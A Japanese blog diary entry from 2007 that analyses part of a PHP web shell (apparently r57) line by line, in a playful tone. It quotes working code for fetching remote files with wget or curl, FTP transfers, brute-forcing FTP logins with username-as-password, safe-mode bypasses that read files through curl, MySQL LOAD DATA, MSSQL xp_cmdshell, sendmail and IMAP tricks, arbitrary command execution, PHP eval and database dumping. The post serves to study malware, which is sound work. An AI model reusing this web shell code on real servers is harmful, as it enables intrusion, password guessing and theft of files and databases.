にっき
2007/05/04 23:57:15
→もっとつおくてにうげ〜む
ちょうど選択肢に入ってたから昨日のてれびで気になってたぷよぷよにちゃれんぢしてみたけど・・・
すっごくおひさしぶりだったのに対戦も〜どで11連鎖までいけたから
やっぱりとことんも〜どで7連鎖ってがっつぽ〜ずするほどのことじゃない気がするにう(´ω`;【みかん
そんなことはやっぱりおいといてまだまだ続きを☆
post で with, rem_file, loc_file が設定されてたら
wget, fetch, lynx, links, GET, curl のどれかで rem_file を取得して loc_file にげっと☆
post で cmd が ftp_file_up か ftp_file_down のときは ftp 接続☆
ほんとになんでもあるにゃぁ・・・ (´ω`;【みかん
ゆ〜ざみんなの ftp にろぐいんできるかちぇっくしそうだけど・・・
ここだとゆ〜ざ名一覧をげっとしておしまいっぽいにう・・・
cmd が空っぽでせ〜ふも〜どじゃないときはふぁいる一覧こまんどをせっと☆
空っぽでせ〜ふも〜どのときは safe_dir をせっとしてから cmd の値を出力☆
せ〜ふも〜どのときは cmd の値によって
safe_dir ならふぁいるの一覧を表示
test1 なら test1_file をげっとして表示☆
test2 なら test2_file を include してみる
test3 なら localhost の mysql に接続して てーぶるを創って test3_file を流し込んでそれを出力☆
test4 なら localhost の mssql に接続しててーぶるを創って test4_file を流し込んでそれを出力?
test5 なら sendmail を使って空め〜るを発射☆ ついでに出力も?
test6 なら imap を使ってめ〜るの一覧を出力☆
・・・っぽいんだけどめ〜るぼっくすに /etc/passwd が指定されてるってことは・・・
test7 なら imap を使って test7_file からはじめのめ〜るをげっと☆
test8 なら test8_file1 を test8_file2 に固めてこぴ〜?
cmd が php_eval, mysql_dump, db_query, ftp_brute じゃなかったら cmd を実行して結果を出力☆
cmd が ftp_brute のときは
user : 一覧から取得した user 名
pass : user 名(reverse がせっとされてたら user 名を逆にしたのも)
でろぐいんできるかちゃれんぢ☆
・・・っておもいっきりくらっきんぐ用の機能にう(´・ω・`;【みかん
cmd が php_eval のときは php_eval の値を eval☆
cmd が mysql_dump のときは
db : で〜たべ〜す名
db_server : DB のほすと
db_port : ぽ〜と
mysql_l : ゆ〜ざ名
mysql_p : ぱすわ〜ど
mysql_db : で〜たべ〜す名
で接続して dif がせっとされてたら dif_name に,それ以外は画面に出力☆
まだ続くっぽいけどこれで処理部分はだいたい見おわったのかにゃぁ?
たぶんきっと次回でらすとまで見れると思いますです☆ヾ(・x・。【みかん
すっごくおひさしぶりだったのに対戦も〜どで11連鎖までいけたから
やっぱりとことんも〜どで7連鎖ってがっつぽ〜ずするほどのことじゃない気がするにう(´ω`;【みかん
そんなことはやっぱりおいといてまだまだ続きを☆
if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
{
switch($_POST['with'])
{
case wget:
$_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
break;
case fetch:
$_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
break;
case lynx:
$_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case links:
$_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case GET:
$_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case curl:
$_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
break;
}
}post で with, rem_file, loc_file が設定されてたら
wget, fetch, lynx, links, GET, curl のどれかで rem_file を取得して loc_file にげっと☆
if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
{
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
if(empty($ftp_port)) { $ftp_port = 21; }
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
if(!$connection) { err(3); }
else
{
if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
else
{
if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):
('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);
}
if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);
}
}
}
@ftp_close($connection);
$_POST['cmd'] = "";
}post で cmd が ftp_file_up か ftp_file_down のときは ftp 接続☆
ほんとになんでもあるにゃぁ・・・ (´ω`;【みかん
if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
{
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
if(empty($ftp_port)) { $ftp_port = 21; }
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
if(!$connection) { err(3); $_POST['cmd'] = ""; }
else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr>
<td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96'].
"</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
@ftp_close($connection);
}ゆ〜ざみんなの ftp にろぐいんできるかちぇっくしそうだけど・・・
ここだとゆ〜ざ名一覧をげっとしておしまいっぽいにう・・・
echo $table_up3;
if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center>
<textarea name=report cols=121 rows=15>";cmd が空っぽでせ〜ふも〜どじゃないときはふぁいる一覧こまんどをせっと☆
空っぽでせ〜ふも〜どのときは safe_dir をせっとしてから cmd の値を出力☆
if($safe_mode)
{
switch($_POST['cmd'])
{
case 'safe_dir':
$d=@dir($dir);
if ($d)
{
while (false!==($file=$d->read()))
{
if ($file=="." || $file=="..") continue;
@clearstatcache();
list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
if(!$unix){
echo date("d.m.Y H:i",$mtime);
if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
}
else{
$owner = @posix_getpwuid($uid);
$grgid = @posix_getgrgid($gid);
echo $inode." ";
echo perms(@fileperms($file));
printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
echo date("d.m.Y H:i ",$mtime);
}
echo "$file\n";
}
$d->close();
}
else echo $lang[$language._text29];
break;
case 'test1':
$ci = @curl_init("file://".$_POST['test1_file']."");
$cf = @curl_exec($ci);
echo $cf;
break;
case 'test2':
@include($_POST['test2_file']);
break;
case 'test3':
if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
$db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
if($db)
{
if(@mysql_select_db($_POST['test3_md'],$db))
{
@mysql_query("DROP TABLE IF EXISTS temp_r57_table");
@mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )");
@mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
$r = @mysql_query("SELECT * FROM temp_r57_table");
while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
@mysql_query("DROP TABLE IF EXISTS temp_r57_table");
}
else echo "[-] ERROR! Can't select database";
@mysql_close($db);
}
else echo "[-] ERROR! Can't connect to mysql server";
break;
case 'test4':
if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
$db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
if($db)
{
if(@mssql_select_db($_POST['test4_md'],$db))
{
@mssql_query("drop table r57_temp_table",$db);
@mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
@mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
$res = mssql_query("select * from r57_temp_table",$db);
while(($row=@mssql_fetch_row($res)))
{
echo $row[0]."\r\n";
}
@mssql_query("drop table r57_temp_table",$db);
}
else echo "[-] ERROR! Can't select database";
@mssql_close($db);
}
else echo "[-] ERROR! Can't connect to MSSQL server";
break;
case 'test5':
if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
$extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
@mb_send_mail(NULL, NULL, NULL, NULL, $extra);
$lines = file ('/tmp/mb_send_mail');
foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
break;
case 'test6':
$stream = @imap_open('/etc/passwd', "", "");
$dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
@imap_close($stream);
break;
case 'test7':
$stream = @imap_open($_POST['test7_file'], "", "");
$str = @imap_body($stream, 1);
echo $str;
@imap_close($stream);
break;
case 'test8':
if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
else echo $lang[$language.'_text119'];
break;
}
}せ〜ふも〜どのときは cmd の値によって
safe_dir ならふぁいるの一覧を表示
test1 なら test1_file をげっとして表示☆
test2 なら test2_file を include してみる
test3 なら localhost の mysql に接続して てーぶるを創って test3_file を流し込んでそれを出力☆
test4 なら localhost の mssql に接続しててーぶるを創って test4_file を流し込んでそれを出力?
test5 なら sendmail を使って空め〜るを発射☆ ついでに出力も?
test6 なら imap を使ってめ〜るの一覧を出力☆
・・・っぽいんだけどめ〜るぼっくすに /etc/passwd が指定されてるってことは・・・
test7 なら imap を使って test7_file からはじめのめ〜るをげっと☆
test8 なら test8_file1 を test8_file2 に固めてこぴ〜?
else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!=
"ftp_brute")){
$cmd_rep = ex($_POST['cmd']);
if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
else { echo @htmlspecialchars($cmd_rep)."\n"; }}cmd が php_eval, mysql_dump, db_query, ftp_brute じゃなかったら cmd を実行して結果を出力☆
if ($_POST['cmd']=="ftp_brute")
{
$suc = 0;
foreach($users as $user)
{
$connection = @ftp_connect($ftp_server,$ftp_port,10);
if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user).
" - success\r\n"; $suc++; } }
@ftp_close($connection);
}
echo "\r\n-------------------------------------\r\n";
$count = count($users);
if(isset($_POST['reverse'])) { $count *= 2; }
echo $lang[$language.'_text97'].$count."\r\n";
echo $lang[$language.'_text98'].$suc."\r\n";
}cmd が ftp_brute のときは
user : 一覧から取得した user 名
pass : user 名(reverse がせっとされてたら user 名を逆にしたのも)
でろぐいんできるかちゃれんぢ☆
・・・っておもいっきりくらっきんぐ用の機能にう(´・ω・`;【みかん
if ($_POST['cmd']=="php_eval"){
$eval = @str_replace("<?","",$_POST['php_eval']);
$eval = @str_replace("?>","",$eval);
@eval($eval);}cmd が php_eval のときは php_eval の値を eval☆
if ($_POST['cmd']=="mysql_dump")
{
if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
else {
if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
else { echo "[-] ERROR! Can't write in dump file"; }
}
} cmd が mysql_dump のときは
db : で〜たべ〜す名
db_server : DB のほすと
db_port : ぽ〜と
mysql_l : ゆ〜ざ名
mysql_p : ぱすわ〜ど
mysql_db : で〜たべ〜す名
で接続して dif がせっとされてたら dif_name に,それ以外は画面に出力☆
まだ続くっぽいけどこれで処理部分はだいたい見おわったのかにゃぁ?
たぶんきっと次回でらすとまで見れると思いますです☆ヾ(・x・。【みかん
こめんと
投稿された内容の著作権はこめんとの投稿者に帰属するっぽいです☆また,現在 IE6 以下で Sleipnir,Lunascape,Donut じゃないゆ〜ざえ〜じぇんとからの描き込みを制限してますです☆
該当しちゃうかたはてきとうにゆ〜ざえ〜じぇんとを偽装しちゃってくださいです(´ω`;【みかん
あじ
ED
えでん
えれふぃ
ぐらぶれ
etc
にっき